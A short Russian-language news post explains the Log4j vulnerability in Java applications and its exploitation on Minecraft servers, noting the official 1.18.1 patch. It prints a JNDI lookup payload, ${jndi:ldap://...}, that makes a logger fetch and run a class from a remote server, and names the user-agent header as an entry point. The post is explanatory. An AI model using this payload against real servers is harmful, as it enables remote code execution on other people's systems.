Уязвимость в библиотеке Log4j угрожает многим приложениям на Java

Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь отправить сообщение в чат, чтобы выполнить вредоносный код.

Обычно от логировщика требуется одно: получить строку и отправить в соответствии с предоставленными конфигурациями. Но Log4j проверяет входные данные и резолвит их.

Как пример, на Хакерньюз приводят такое:

Logging from ${java:vm} // на выходе будет Logging from Oracle JVM

Если как аргумент скормить что-то такое:

${jndi:ldap://someremoteclass}

то с удалённого сервера можно подгрузить класс и динамически исполнить вредоносный код.

Как пример уязвимости — http сервер, который логирует строку, скажем, user agent.

Конкретно для Minecraft вышел официальный патч 1.18.1, который закрывает уязвимость, но множество пользовательских серверов всё ещё подвержены этому.

115115
112 комментария